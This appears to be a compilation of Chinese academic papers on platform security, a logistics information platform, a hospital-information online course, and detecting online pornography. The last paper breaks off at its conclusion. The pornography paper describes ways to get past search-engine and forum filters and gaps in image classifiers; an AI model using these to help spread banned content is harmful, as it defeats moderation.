(3) 中间件到数据库。虽然目前数据库位于防火墙的后面, 数据的加密从理论上可能并不是必须的, 但是由于应用服务器和数据库要在因特网上通信, 依然存在着极大的风险。My SQL提供了SSL方式的加密连接, 在My SQL中执行相应的配置, 激活SSL的设置, 从而保证数据库连接的安全。
(4) 数据库中数据的安全。事实上数据库里面的信息是目前最有价值的攻击目标, 系统应该能够识别出非授权的访问和修改。为了保护信息的安全, 我们将采用之前所设计的加密算法做加密。私钥掌握在用户手里, 即使WEB服务器受到了攻击, 也不会导致用户数据的泄露。针对原有的数据加密存储安全措施外, 利用数据库自身的安全机制提高整体应用软件的安全能力也是必不可少。针对不同的连接给予不同的数据库访问权限, 防止人为直接接入数据库访问数据。另外本课题将使用统一字段编码的方式达到对数据扰乱存储的目的。即使有人直接看到了数据库里面的数据, 也很难分析其具体的含义。
本课题从安全性和易维护性的角度考虑, 选择使用J2EE架构开发, 语言采用Java开发语言, 开发工具使用My Eclipse, 数据库使用My SQL, WEB服务器使用JBoss, 开发平台为Windows。之所以选用Java语言作为开发工具, 是因为它是唯一一种从设计开始就已经考虑安全性的工具代码。Java在程序的功能性和保护主机的安全性两方面达到了最大的平衡。Java采用一个称为“sandbox”的模型来运行代码。不被信任的代码只能在sandbox中运行而不能进行多数针对主机的操作, 比如读、写或删除文件, 监听或接受网络连接等。同时, Java的平台无关性保证了用Java编写的程序能够非常容易从一个平台移植到另一个平台上。JAVA+My Eclips+My SQL+JBoss构成了一整套J2EE的集成开发环境, 由于这些软件都是免费的, 为最终的软件开发使用节约了成本, 从而达到最理想的性价比。
摘要:文章从江苏省科技金融信息服务平台网络应用角度出发, 针对目前比较常用的几种与软件相关的安全技术展开对比研究, 最终得出适合江苏省科技金融信息服务平台应用的网络安全策略。
关键词:信息网络,加密,安全协议,策略
参考文献
[1]宋波.Java WEB应用与开发教程[M].北京:清华大学出版社, 2006.
[2]Sean Convery.网络安全体系结构[M].王迎春, 谢琳等, 译.北京:人民邮电出版社, 2005.
[3]林柏钢.网络和信息安全教程[M].北京:机械工业出版社, 2004.
[4]徐迎晓.Java安全性编程实例[M].北京:清华大学出版社, 2003.
[5]蒋一新, 杨树堂.一种基于Web Services的企业应用集成方案[J].计算机应用与软件, 2006, 23 (9) :67-68.
[6]李佳静, 徐辉.入侵检测系统中的协议分析子系统的设计和实现[J].计算机工程与应用, 2003, 39 (12) :152-155.
[7]庄湧.PKI中的可验证部分密钥托管[J].计算机学报, 2006, 29 (9) :1584-1589.
[8]刘岩, 毛迪林.基于AOP的Web Services管理架构研究[J].计算机应用与软件, 2006, 23 (11) :70-72.
[9]闫鸿滨, 袁丁.基于单向函数的动态密钥托管方案[J].计算机应用, 2006, 26 (5) :1093-1095.
信息网络平台 篇10
物流信息公共网络平台以其跨行业、跨地域、多学科交叉、技术密集、多方参与、系统扩展性强、开放性好的特点对现代物流的发展构成了有力的支撑。企业使用公共物流信息平台可以利用其庞大的资料库以及开放性的商务功能实现企业自身的信息交流、发布、业务交易、决策支持等的信息化管理,可以说使用公共物流信息平台是企业信息化的捷径。公共物流信息平台承担供应链管理过程中不同企业间的信息交换枢纽支持,提供车辆跟踪、定位等共享服务功能,提供政府行业管理决策支持等。物流信息公共网络平台的总体结构如图1所示,各模块有以下十个主要功能。
1.1 数据交换功能。
提供与第三方电子数据交换的途径,可灵活地配置数据导入导出的方式,支持TXT文本、XML文本和EXCEL文本三种文件格式。这是信息平台的核心功能,主要是指电子单证的翻译、转换和通信,包括网上报关、报建、许可证申请、结算、交(退)税、客户与商家的业务来往等与信息平台连接的用户间的信息交换。数据交换如图2所示。在数据交换功能中,还有一项很重要的功能——存证管理功能。存证管理是将用户在信息平台上产生的单证信息加上附加信息,按一定的格式以文件形式保存下来,以备将来发生业务纠纷时查证、举证之用。
1.2 信息发布功能。
该功能以Web站点的形式实现,企业只要通过Internet连接到信息网络平台Web站点上,就可以获取站点上提供的物流信息。这类信息主要包括水、陆运输价格、新闻和公告、政务指南、货源和运力、航班船期、空车配载、铁路车次、适箱货源、联盟会员、职业培训、政策法规等。
1.3 会员服务功能。
为注册会员提供个性化服务。主要包括会员单证管理、会员的货物状态和位置跟踪、交易跟踪、交易统计、会员资信评估等。
1.4 在线交易功能。
交易系统为供方和需方提供一个虚拟的交易市场双方可发布和查询供需信息,对自己感兴趣的信息可与发布者进一步洽谈,交易系统可以为双方进行交易撮合。交易处理过程简单描述如下:
终端或自助设备的交易请求上送→加密处理→预处理→加解密→送往主机→处理结果返回加解密→处理结果返回终端或自助设备。
1.5 智能配送功能。
利用物流中心的运输资源对商家的供货信息和消费者的购物信息进行最优化配送,使配送成本最低,在用户要求的时间内将货物送达。通常的解决方法是建立数学模型,由计算机运用数学规划方法给出决策方案,管理人员再根据实际情况进行选择。智能配送要解决的电讯问题包括线路的选择、配送的发送顺序、配送的车辆类型、客户限制的发送时间。
1.6 货物跟踪功能。
采用GPS/GIS系统跟踪货物的状态和位置。状态和位置数据存放在数据库中,用户可通过Call Center或Web站点获得跟踪信息。
1.7 库存管理功能。
利用物理信息平台对整个供应链进行整合,使库存量能在满足客户服务的条件下达到最低库存。最低库存量的获得需要大量历史数据的积累和分析,要考虑客户服务水平、库存成本、运输成本等综合因素,最终使成本达到最小。可解决的典型问题包括:下轮生产周期应生产的产品数量;补充货物的最佳数量;补充货物的最低库存点(安全库存)。
1.8 决策分析功能。
建立物流业务的数学模型,通过对已有数据的分析,帮助管理人员鉴别、评估和比较物流战略和策略上的可选方案。典型分析包括车辆日程安排、设施选址、顾客服务分析。
1.9 金融服务功能。
在相关法律法规的建立和网络安全技术的进一步完善后,可通过物流信息平台网络实现金融服务、如保险、银行、税务、外汇等。在此类业务中,信息平台起一个信息传递的作用,具体业务在相关部门内部处理,处理结果通过信息平台返回客户。
1.10 系统管理。
对整个信息平台的数据进行管理,包括用户管理、权限管理、安全管理和数据管理等。物流系统涉及方方面面的使用人员,系统管理模块将对这些人员进行集中管理,为这些人员分配不同的模块及使用权限。这样可以保证用户安全地使用自己的模块系统,完成自己的工作与职责,而不会越权使用其他的模块系统。
大型网络化关系型数据库中,安全机制非常完善,可以将数据库使用人员分为多种角色,每种角色可以有多个用户;不同角色,不同用户拥有不同的权限。最高权限者为超级用户,他可以为其他用户分配权限。用户管理模块将基于数据库的安全机制,开发更灵活的权限管理功能。
系统管理模块的功能主要包括:
(1)用户管理:各类用户信息的录入和管理,包括系统用户和成员用户;
(2)角色管理:系统角色的定义和管理;
(3)权限管理:设置各类用户的不同权限;
(4)用户登录管理:用户登录状态的管理;
(5)用户密码管理:修改及设置用户登录密码;
(6)安全管理:物理网络系统是构建在Internet/Intranet基础上的Browser/Server体系构架的应用系统,对各类数据的传输、保密、验证有着非常严格的要求。系统安全管理主要包括数据的加密和数字签名:(1)数据加密:对通过网络传输的数据信息进行严格的数据加密处理;(2)数字签名:对网上传输的数据文件进行有效性确认;
(7)数据管理:信息系统的应用必然会涉及大量信息数据的产生,对各类数据,均需要进行细致的分析挖掘,从而为领导的正确决策提供强有力的支持。同时,这些大量的数据都应作妥善的处理与保存,包括:(1)数据备份:提供数据备份支持;(2)数据恢复:异常状况下用于数据的恢复;(3)导出历史数据:以不同形式导出历史数据。
2 公共物流信息网络平台的构建
(1)构建公共物流信息平台,要总体规划,分步开发,递进完善。优先构筑公共物流信息基础平台,推动政府相关系统及企业信息系统加入平台。并且要以企业需求为导向,通过示范工程积极进行公共物流信息系统平台的宣传,注重平台的品牌战略。通过推出平台的认证体系,推动物流信息服务,为企业开发出以平台为基础的丰富的信息服务产品。加快物流信息共享协议开发和推广工作。以各地物流中心、物流园区为基础,通过政府引导、推动和市场运作,根据我国物流的特点开发出实用型的平台;因为各地区发展不平衡,要因地制宜,结合各地实际,发展区域性的物流信息服务平台;在形成区域性的物流信息平台基础上,经过二次整合,形成全国性的统一平台。
(2)公共物流信息系统平台本质上是公告物理信息系统平台上层部分的加强与完善,不能脱离底层的公共物流信息基础平台而独立地发展,底层可以较多地依靠政府的参与,上层平台层次较低层高,则更多地依靠市场的力量来推动。各地发展经济水平不同,公共物流信息系统平台的建设模式也各有特点。在市场经济相对发达、运输市场发育较为完善的地区,物流信息服务平台的建设已经成为物流信息服务企业、物流企业、制造企业、流通企业的迫切要求,他们为了满足各自的需要,自发的组织起来,对地区物流信息业务的发展起到了推动作用,成为物流信息服务平台建设的主要力量。由于该平台的建设主要推动力量来自于下层具体企业,市场需求明确,在完成平台建设之后,能使平台在当地的物流信息服务市场中发挥作用,产生效益,收回投资,充分利用物流信息平台资源。因此市场经济发达的地区的公共物流信息系统平台建设,可以在政府提供必要的支持基础上,采用领袖企业联盟的方式实现。但要注意避免将平台的功能过于具体或者陷入具体应用项目的倾向,考虑其独立性和开放性。企业及行业协会等往往是信息化以及信息标准化的一个主要实施和推动力量。在实践中,一些领袖企业的标准最终可能会演变成行业标准,企业产品也可能成为通用商品。如果某个物流信息服务企业的产品在一些领域得到了一定程度的推广应用,就有可能将企业的产品标准,通过政府规划物流信息平台的过程上升为通用标准,而向其它企业推广并实施标准化,如“56NET”,它的企业平台可以通过上海市政府规划物流信息平台的机会,提升成为通用平台和标准。
(3)在经济欠发达地区,如果物流信息平台还没有建设的话,可以根据国家的规划,不要急于发展物流信息平台,避免重复建设,而要尽可能利用其它地区已建好的平台,实现资源共享,充分利用信息服务活动更少地受物理空间和地域限制的特点。可以将公告物理信息系统平台的建设尽可能与物流园区、物流中心等项目建设一起作为政府引导下的信息化项目进行建设,引进其它发达地区建成的公共物流信息系统平台,既减少投资,又能实现资源共享和推进信息标准化。公共物流信息系统平台的建设模式,要以企业化运作为主要形式:以提供在“公共物流信息基础平台”基础上的物流信息服务为中心;形成以发达地区检查的平台为引导、以欠发达地区的参与为支撑的互动局面;以形成区域性、全国性的统一平台为初级目标和阶段目标,以参与国际物流信息化和信息服务市场的竞争为高级发展目标。
(1)将公共物流信息系统平台组织成一个实体:
以组建股份制企业等形式将公共物流信息系统平台组织成一个经济实体,组织相关的软件开发商、物流企业和一些科研单位,并吸纳部分其他物流信息服务企业和物流信息服务需求者,参与到平台的建设中来。同时,也鼓励相关企业和用户与平台以协议的方式共同支持相关标准和框架的推广。
(2)对公告物理信息系统平台进行配套支持:
政府在税收、贷款、人才引进方面给予“公告物理信箱系统平台”企业一定的优惠政策,尤其是在其起步发展阶段,使这样的信息服务企业能够得到足够的启动资源。
(3)创造一个可持续发展的环境,并为平台最终整合成为全国统一的平台创造条件:
将公共物流信息系统平台的上下两层的建设相对分离。将“公共信息基础平台”和“公告物理信息系统平台”的建设相对分离开,前者与后者的功能和属性不同,前者公益性比后者更突出。因此,也许几个地区有各自的“公共物流信息系统平台”,但却使用同一个“公共物流信息基础平台”;而一个“公共物流信息系统平台”跨几个“公共物流信息基础平台”,这些形式都是可以的。
3 结束语
现代物流已成为跨部门、跨行业、跨地域的以现代科技管理和信息技术为支撑的综合性物流服务。在现代物流中,信息已成为提高营运效率、降低成本、增进客户服务质量的核心因素。在信息平台上,信息流的处理和利用水平决定整个物流过程的运作水平。信息平台的建设,一方面是发展现代物流的核心和关键,另一方面,通过建设信息平台又极大地推动着现代物流向前发展。随着以信息技术为基础的电子商务的迅速发展,商品与生产要素在全球范围内以空前的速度自由流动,跨国、跨地域、跨行业的物流日趋繁忙,有力地促进了经济社会的繁荣发展。电子商务向物流领域大规模渗透,信息化成了现代物流的核心。信息化的外延和支撑是信息平台,其应具备数据交换功能、信息发布服务功能、会员服务功能、在线交易功能、智能配送功能。内涵包括信息技术、信息流、信息传输、信息集成库等,也包括诸如询价单、报价单、付款通知单、转账通知单等,还包括交易方的支付能力、支付信鉴等。其中,各种单证在信息中占了相当大的一部分。没有信息网络支撑,无法实现单证的有效确认、传递、审办、复核等流程,就无法形成现代物流产业。因此,建设信息平台,不仅对完善现代物流功能具有重要的现实意义,而且对发展跨行业、跨区域、跨国度的现代物流具有深远的历史意义。
参考文献
[1]施先亮.建设物流信息平台促进现代物流发展[J].中国物流与采购,2002(7):21-23.
[2]董敬欣.公共物流信息平台设计研究[D].成都:西南交通大学(硕士论文),2002.
[3]董千里.区域综合物流信息平台的功能与构建研究[J].交通运输系统工程与信息,2002(2):32-33.
[4]谈丽萍.区域物流信息平台建设研究[D].武汉:武汉理工大学(硕士论文),2005.
[5]刘小卉.物流管理信息系统[M].上海:复旦大学出版社,2006.
信息网络平台 篇11
【关键词】医院信息系统 网络课程平台 Blackboard
【中图分类号】G 【文献标识码】A
【文章编号】0450-9889(2016)11C-0191-02
医院信息系统是现代化医院管理过程中需要使用到的一个非常重要的工具,系统的好坏直接影响到医院的管理水平以及各部门协调配合的效率。而医院信息系统则是信息管理与信息系统专业(医学信息管理方向)的一门重要专业核心课程,通过学习这门课程,学生可以熟悉各科室部门的业务流程,了解医院信息系统对于医院管理的作用,掌握医院信息系统的基本设计方法及部署维护方法,提高对医学信息进行信息分析及信息处理的能力。目前,各学校已普遍采用网络课程教学平台进行辅助教学活动,笔者所在学校采用Blackboard作为网络教学平台工具,医院信息系统课程依托该平台进行网络课程建设。
一、医院信息系统网络课程建设内容
医院信息系统网络课程教学平台主要作用是利用网络和多媒体技术对传统教学进行支持或辅助,使教学能突破时间和空间的限制,实现教与学资料共享、双向交流互动,促进学生自主学习。因此笔者构建的医院信息系统网络课程平台主要包括课程信息、交流互动和拓展资源三大模块,三个模块又分别由多个子模块组成,如图1所示。
(一)课程信息模块。课程信息模块主要包括与课程教学内容相关的一些资料、课件及通知等信息。教师可以发布通知,共享与课程相关的课件、各种多媒体辅助资料等。学生可以使用终端在任何有网络的地方获取课程相关的通知、在线观看或者下载上课的课件、音视频资料等。课程信息模块的主要内容包括以下方面:
1.课程通知。发布与课程相关的通知,如课堂课后作业要求以及提交时间、问卷调查形式及地址等,以便教师将课程要求及课程实施进展实时地展现给学生,学生也能实时查阅,了解该课程各阶段的要求。
2.课程信息。发布课程基本信息,包括课程简介、课程基本要求、选用教材及教学参考书、授课计划、成绩评定办法及学习方法等。通过课程信息,学生可以对课程及要求形成基本了解,引导学生使用网络课程平台,以便在教学计划及进度安排基础上,安排课程学习及自主学习。
3.教师信息。发布课程教学组所有老师信息,包括每个老师的姓名、职称、电子邮箱、联系电话、上班地点及时间,并要求上传一张1寸照片。方便学生了解和熟悉任课教师的情况,也方便联系,答疑解惑。
4.课程文档。发布课程实施过程中的相关文档,包括教学大纲、电子教材、每学年授课资料、授课录像、习题库和视频音频动画资料。按课程内容及要求编写教学大纲,使学生对课程阶段学习的重点和难点以及学习方法有更为深入的认识。每学年授课资料包括教师在教学过程中使用的多媒体课件、参考资料等,学生可以在线观看学习或者下载,方便学生获取学习资源。授课录像主要由录像视频组成,录制的是部分难点以及部分实践操作。分章节和知识点构建习题库,基本由选择和判断等客观题型组成,以方便组成习题卷方便学生进行练习和测试。视频音频动画资料是在网络上收集的相关多媒体资料,以视频音频动画的方式展现,给学生提供趣味性和知识性融合的学习方式。
(二)交流互动模块。交流互动模块主要包括作业测试、网络答疑讨论、PBL讨论等方面的内容。为教师和学生提供课下交流互动的平台,教师可以设置作业,学生完成后提交,教师可以对作业进行评分。教师也可以设置测试,学生在线完成后,教师端可以查看学生成绩,了解学生掌握知识的程度。对于一些常见问题,教师可以不定期的组织师生进行网络在线讨论,没有时间和空间的限制,PBL讨论课题也可以从课堂延伸至网络,促进学生主动学习和参与积极性。
1.作业测试。作业测试由各班级作业、答疑专区、课后问卷调查三部分组成。布置作业时,给出作业完成要求,可以要求以小组或者以个人为单位完成,同时,每布置一个作业,相应会出现一个通知,给出完成作业的有效时间。学生可随时查看作业要求,完成作业后,以小组或者个人为单位提交。教师根据学生完成程度打分,学生可实时查询分数,并且分数可设置自动计入平时分。学习过程中出现的任何问题都可以在答疑专区提出,教师和学生可以在此区域进行讨论。每个学年一轮教学完成之后,我们会组织一次课后问卷调查,收集学生的建议和意见,有针对性地进行改进。
2.交流讨论。交流讨论由小组协作、虚拟课堂、集体备课专区、交流规格四部分组成。小组协作对应作业测试模块的以小组为单位完成作业,除此之外,小组内的成员可以在小组内进行讨论、文件共享等操作。虚拟课堂将课堂从教室延伸至网络,提供多一种教与学的方式。各任课教师可以在集体备课专区进行讨论,打破时间和空间的限制,让备课活动在网络上完成。
3.PBL讨论。PBL讨论是将课堂进行的PBL课题延伸至网络,提供更多的讨论空间和发言的机会。
(三)拓展资源模块。拓展资源模块是基于课程相关的一些网络资源,比如电子图书、相关网站论坛等。拓展资源是对课程知识的一个补充,使学生的学习不仅仅局限于课本以及课堂,促进学生自主学习。拓展资源模块由电子图书、特色项目、外部链接、专业词汇表四个部分组成。
二、网络课程辅助教学的应用效果
(一)延伸课堂,打破时空限制。学生可以在任意时间、任意地点参与学习过程,复习学习内容,拓展学习空间,提高学习资源的利用率,提高学习的效率。可以很大程度地辅助传统课堂模式的教学。Blackboard平台追踪显示,课件下载和在线阅读次数均超过200,以学生43人计,人均访问次数约5次。
(二)资源共享,提高自主学习。通过网络课程进行课程资料的共享和资源拓展,不再有学生下课后用优盘拷贝课件的情况。问卷调查结果也显示,学生更喜欢这种网络共享的方式,访问起来更加方便快捷。同时对拓展资源,学生还会在访问后给出一些建议,把参考价值更高的排位靠前。
(三)交流互动,方便教学讨论。通过课堂平时分奖励形式,比如发起一个讨论帖,奖励5分,参与一个讨论帖,奖励1分,大大提高了学生对于教学问题讨论的热情。虽然在执行过程中可能会存在有为了赚分而发帖的情况,但大部分同学是在认真发言讨论。在提问与回答的过程中,催发了大家进行多方位思考,一定程度上提高了学习的自主能动性。
(四)效果追踪,有利教学反馈。Blackboard平台提供了追踪统计功能,能让教师实时掌握学生访问网络课程资源的情况,根据访问的情况,也可以反映出资源受欢迎的程度,让教师可以根据情况进行相应的调整。同时,我们在每轮教学过后,都会发布教学效果问卷调查,及时收集学生关于课程的反馈信息,以便进一步改进教学。
三、网络课程辅助教学的存在的问题和改进意见
网络课程平台很大程度上拓展了课堂教学的内容和形式,但在使用过程中,依然存在一些问题有待改进。
(一)使用频率偏低。大部分同学只有需要下载或浏览课件和老师布置的作业的时候才会去访问网络课程平台。绝大部分同学会通过网络课程平台提交作业,但还存在一小部分同学更加习惯于把作业发到老师邮箱或者以其他方式提交。虽然经教师一再提醒,现象有所改观,但是传统提交作业方式效率更高,作业更齐,以致部分教师会倾向于选择学委收作业的传统方式。网络课程的访问频率和使用频率都有待提高。
(二)部分操作不符合习惯。由于Blackboard是美国公司的产品,在某些操作上不符合国人的使用习惯。如词汇表,默认的文本编辑器保存的是ANSI编码,而Blackboard平台要求使用UNICODE编码,如果上传ANSI编码的词汇表,中文部分将表现为乱码。如讨论板块,发表新帖及回复留言与互联网上普遍的论坛帖格式不一样,给学生与老师在发帖讨论过程中造成很大的困扰。
【参考文献】
[1]冯天亮,尚文刚.对开展医院信息系统教学的思考[J].医学信息学杂志,2010(11)
[2]刘伟,梁丹凝.医院信息系统课程教学评价调查与分析[J].广西教育,2016(7)
[3]刘伟,陈鹤年,张锦,等.医院信息系统课程教学体系改革探讨[J].医学信息学杂志,2013(10)
[4]袁文业,彭惠茹,张洪亮,等.基于网络教学平台的“生物统计学”教学改革及实践效果分析[J].中国农学通报,2011(4)
[5]刘伟,邓建强.基于.NET的医院信息仿真实验系统的设计与实现[J].中国数字医学,2013(11)
【基金项目】海南省教育厅高等学校教育教学改革研究项目“《医院信息系统》实践课程的建设与研究”(HNJG2014-42)
网络信息监控之网络淫秽色情研究 篇12
在信息时代,良好还是不良的信息都会充斥在网络中。网络淫秽色情信息伴随着网络的诞生而诞生,通过各种载体传播到了世界的各个角落,直接或者间接危害着网民。我国的法律明确规定传播淫秽色情是非法的,然而有需求就有市场,由于有了网络这一便捷的载体,淫秽色情信息在各类法律、法规以及措施的围追堵截下,依旧在夹缝中继续生存,并且有愈演愈烈的趋势。
2 网络淫秽色情信息
2.1 网络淫秽色情信息的发展
网络时代下淫秽色情市场巨大,一批又一批的网站在被封后死灰复燃。国内禁止网络淫秽色情网站的存在,不法分子就把服务器架到国外,令我国政府没有办法封掉,只能采取屏蔽这一措施,而防火墙往往屏蔽不了数量巨大且域名经常变换的色情网站。
近年来,移动设备已经取代了传统的PC成为了应用更广泛的上网设备,手机APP的迅速发展给网络淫秽色情信息的发展又提供了一个良好的载体。新兴的移动互联网传播占比迅速增长,网络淫秽色情信息传播已经从过去的网站、论坛、贴吧、博客、QQ群等阵地向着微信、陌陌等IM以及视频网站等新兴的移动互联网阵地转移。同时网络招嫖、网络淫秽色情表演等网络时代新行为也对网络信息监控带来了新的挑战。
2.2 网络淫秽色情信息的传播来源
2.2.1 国内搜索引擎
以百度搜索引擎为例,百度按照国家相关的法律规定对一些关键字已经进行了屏蔽处理,但绕过关键字屏蔽来搜索色情内容没有任何难度。例如,用搜索引擎搜索色情片的番号,如“COSQ-xxx”,搜索结果中“BT种子搜索”一类的网站就可以得到想要的色情片;当百度搜索键入“色情网站”,由于搜索结果的过滤,搜索不到色情网站链接,但改变搜索的关键字为“访问升级”时,搜索结果靠前的几乎都是色情网站。
2.2.2 磁力链接
政府展开的净网行动,使得很多色情网站被封,网盘上的色情资源被屏蔽,快播等涉黄视频网站被查封,但新兴的传播方式又来填补市场的空白,比如磁力链接。磁力链接(Magnet URI scheme),能够在对等网络中对文件完成“数字指纹”标识和搜索,格式如magnet:?xt=urn:sha1:XXXX,因为都只是字符信息,论坛或者群也不容易封掉磁链的传播,当管理员试图通过磁链前缀magnet:?等进行屏蔽时,传播者会在发链接时通过插入汉字、空格等遮蔽磁链前缀这一明显特征,或者干脆把磁力链接P到了图片上面,让管理者很难通过设置屏蔽或者自动删除规则来屏蔽相关内容。
2.2.3 社交软件
利用微信、QQ、陌陌等社交软件的小视频/语音功能,可以传播淫秽色情的文字、音频和视频。由于社交软件必须保护用户的隐私,所以一般来说社交软件并不会监视用户的所有信息,只有举报才会对淫秽色情信息传播的用户进行惩罚。
2.2.4 国外搜索引擎
国外的搜索引擎并不会过滤色情的关键词,这跟国外的相关法律有关,部分欧美国家的法律对成人色情信息是不禁止的,而部分国外搜索引擎在我国并没有被屏蔽。例如“yandex.com”以及雅虎外国的英文搜索网址“sg.search.yahoo.com”,只需要键入中英文的色情关键词同样可搜索到大量的色情信息。
2.2.5 流媒体直播
现在是一个“全民直播”的时代,一些直播网站和主播为了金钱和搏人眼球,在直播中会做出一些不文雅,甚至是色情的表演。直播平台由于是实时性,所以对其监控需要程序+人工双监控,即使这样也很难在第一时间发现并屏蔽此类流媒体直播。
3 网络淫秽色情信息的监控
3.1 网络淫秽色情信息监控的难点
网络淫秽色情信息由于存在于网络,生于网络,寄托于网络,传播于网络,所以它也具备部分网络信息的特性,监控难点也和其他网络信息监控部分相似。
3.1.1 匿名性
匿名性既是传播特点也是监控的难点。IP地址、MAC地址这些曾经的网络层面的“指纹”信息,由于现在有了IP地址伪造以及MAC地址修改的技术,也不能非常准确地去锁定一个上网人或者设备了。
3.1.2 信息量巨大
当前信息爆炸的时代,网络上发布的信息众多,想要在浩瀚的信息海洋中依靠人工来鉴别是否是淫秽色情收效甚微,因此必须广泛依靠相关信息挖掘和鉴别技术来进行筛选和鉴别,辅之人工鉴别。
3.1.3 技术局限性
即使到了现在,也没有哪个技术可以说百分之百把网络上面的淫秽色情信息全部鉴别出来,因为传播的渠道和方法在不停的改变和更新,往往技术更新跟不上传播方式的跟新。并且由于技术手段都是通过算法来进行实现,远远不如人脑的鉴别率高,并且无法回避的就是错判还有漏判的问题,最终还是要靠人手来进行最后的判断,失去了使用计算机识别淫秽色情图片的最大好处——节省人力。
3.2 网络淫秽色情图片的鉴别技术
要对网络淫秽色情信息进行监控,首先要完成鉴别,对信息进行筛选鉴别,才可以有效地进行监控。
3.2.1 基于皮肤颜色检测的色情图片鉴别技术
该技术是对图片上面的颜色色块进行鉴别,即只要图片里面大部分的区域颜色是肉色,既判定为色情图片从而被过滤掉。此技术的缺点十分明显,那就是它只简单对颜色进行了判断,没有做进一步的分析,像大头贴、猪肉之类的大块肉色的图片都会判定为色情图片,错判率太高。
3.2.2 基于颜色信息以及皮肤纹理综合鉴别的色情图片鉴别技术
该技术是在颜色鉴别的基础上,对纹理信息等进行更多的判断。人体皮肤特有的纹理特征可以帮助程序更加容易也更加准确判断出图片是否是色情图片,再不会把黄色的沙发、粉红色的猪这类图片判断为色情图片了。但是这个技术也是有明显的缺陷的,那就是比如比基尼照片只能说是性感,但是不能说是色情,这样的误判率会极大降低网民浏览网页时候的体验。[1]
3.2.3 基于肤色和特征部位联合检测的色情图片鉴别技术
该技术是在以上技术的基础上面通过对特征部位的检测来联合进行色情图片的鉴别,比如特征部位选择乳头等。该技术对机器进行特征模型训练,使程序可以识别出“乳头”这一特征部位,结合对肤色及皮肤纹理的识别,使得对于裸露上身的色情图片识别率大大提高。这种技术的缺点就是对于没有特征部位的图片识别率低下,比如只漏出来阴部或者生殖器的色情图片,使得漏判率也高。[2]
3.2.4 基于敏感部位检测的色情图像识别技术
该技术对原有技术进行了补充,即特征敏感部位不仅仅限于乳晕、乳头,还把阴部、生殖器等部位加进去,使得特征部位明显增多,可以应付大部分类型的色情图片。但是以上两种基于特征部位检测的方法都有一个共同的缺点就是如果不存在特征部位或者特征部位残缺,将导致与之前学习训练的敏感部位不一样,那么也会漏判。[3]
3.3 网络淫秽色情视频的鉴别技术
淫秽色情视频和淫秽色情图片一样是网络上面存在数量较多的淫秽色情信息之一,下面介绍两种淫秽色情视频鉴别技术。
3.3.1 关键帧技术
关键帧技术是最原始的一种色情视频鉴别技术。该技术基于上文所提及的色情图片鉴别技术,对视频进行随机的帧截取,然后对截图鉴别是否为色情图片。一段视频将设置多个检测点,并且检测点布满整个视频,不会单独分布于某个时间段内,这样有效防止色情视频中的色情片段单独分布于某个时间段内导致无法检出色情片段。该技术关键还是取决于色情图片的鉴别技术。
3.3.2 基于肤色和行为的色情视频检测技术
色情视频有一个很重要的特征就是里面会有大量的往复运动,所以可以利用光流上下文直方图来训练识别器。把待检测的视频的每一帧图像进行截取,然后对截取的图像进行光流特征提取,将提取的特征点按照大小、方向分布在一个同心圆当中,然后再根据光流特征点去计算光流直方图。得到的光流直方图与前段提到的关键帧技术相结合,当两种检测均报告待检视频为色情视频时,可以大概率认定该视频为色情视频。[4]
4 网络淫秽色情图片鉴别技术的改进
4.1 色情图片鉴别技术的漏洞
对于色情图片鉴别,每一项技术都依赖于一个关键的技术———肤色鉴别和纹理鉴别。网络色情图片中的一类———色情漫画,在色情图片鉴别时容易漏报,原因是色情漫画一般都是黑白或者灰度的,并没有彩色,这样肤色检测就失去了效用了,同时由于是画出来的人物肌肤并没有皮肤的纹理,所以说纹理鉴别这一块也失效了。对于色情漫画来说,唯一生效的鉴别技术就是敏感部位的检测了,由于只有单一的敏感部位检测,所占的权重并不大,并没有能达到判定为色情图片的标准,所以色情漫画很容易会逃脱监管。下面以腾讯的某鉴黄工具来进行说明。
腾讯某鉴黄工具号称鉴别率等达到99%,该工具继承了上文提及的各类技术并且进行了改进,但相关技术缺点还存在,比如对残缺的特征部位识别率低下。在维基百科搜索词条“口交”,将把词条的色情配词图下载后用该工具鉴别,得到的结果却是正常概率57.446%,漏判。对其他三张黑白的色情漫画图片进行鉴别,像敏感部位(乳头、生殖器)都有,然而因为是黑白的图片,工具判断为非色情图片的几率分别为50.2%、75.4%、70.4%,全部漏判。
基于深度学习的智能鉴黄工具都是基于肤色、纹理、颜色、敏感部位等的判别,而相对彩色图片,黑白图片的鉴别对于前几种方法都无效,而敏感部位的检测又受到其他相似外形物品的干扰使得错判率过高。
4.2 色情图片鉴别技术的改进方案
4.2.1 方案设想
对于黑白颜色的色情图片鉴别来说,需要改进鉴别方案才能提高正确率。首先对图片的颜色进行分析,利用RGB颜色模型或者HSV颜色模型来进行判别,如果判断为彩色图,那么彩色图的鉴别在现今的技术下判别并不难,可以做到高准确率判断;如果是黑白图片,程序就跳过颜色、纹理等鉴别,只对敏感部位一项进行鉴别,如果出现了敏感部位,那么将交由人工审核,同时用多项样本让程序进行学习,训练其提高鉴别效率。
4.2.2 改进方案
首先定义如下:P为色情图片鉴别的概率,Q1,Q2,Q3分别为肤色检测、纹理检测、敏感部位所占的权重。
令P(max)=1,Q1(max)=0.3,Q2(max)=0.3,Q3(max)=0.4。可以得出如下算式
P=Q1+Q2+Q3
Q1=Q1(max)*N其中N表示肤色占构图面积的百分数
Q2=Q2(max)*L其中L表示是否检测到皮肤纹理,是为1,否为0
Q3=Q3(max)*K其中K表示的是检测到的敏感部位的数量的一个函数,当K=1表示检测到大于等于5个敏感部位,当检测到的敏感部位小于5个时,则K=0.2*检测到的敏感部位数。
当Q3=0时,则P=0。
当P>0.6的时候,程序认为该图片为色情图片,否则不是色情图片。
新的方案里面,在判断为黑白图片的时候,取消了肤色鉴别的权重Q1,减少了纹理鉴别的权重Q2,把多余的权重全部分配给敏感部位Q3,然后再重新定义Q3的算法。
在此方案中,Q1=0,Q2=0.2,Q3(max)=0.8。
定义新的函数S,S=检测到的敏感部位数量*0.9*0.2*(皮肤占图片的面积百分比+敏感部位占皮肤面积的百分比)。
由于色情黑白图片、漫画基本构图和彩色的色情图片是差不多的,所以可以直接套用某些彩色图片的鉴定结论。黑白图片没有肤色,假定所有的图片都是敏感图片,则S=检测到的敏感部位数量*0.9*0.2*(0.75+敏感部位占图片面积的百分比)。
当Q3>0.8时,Q3=0.8。
综上所述Q=Q2+Q3。
由于目前为止对于黑白的漫画识别率不高,所以应当降低检测的标准,当Q>0.55的时候可以认定该图片涉嫌为色情图片;当0.55>Q>0.5时可以认为该图片为“高危”图片,需要进行人工检测。
5 结论
